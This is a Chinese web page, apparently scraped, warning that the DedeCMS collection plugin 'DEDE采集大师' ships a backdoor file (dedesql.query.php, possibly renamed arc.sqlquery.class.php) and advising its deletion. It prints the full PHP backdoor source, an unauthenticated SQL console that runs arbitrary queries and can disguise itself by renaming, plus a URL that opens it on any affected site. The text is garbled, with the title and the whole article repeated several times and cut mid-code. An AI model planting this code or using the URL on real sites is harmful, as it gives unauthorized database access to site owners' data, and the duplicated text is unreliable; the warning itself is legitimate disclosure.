np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法

4.去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>。

DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 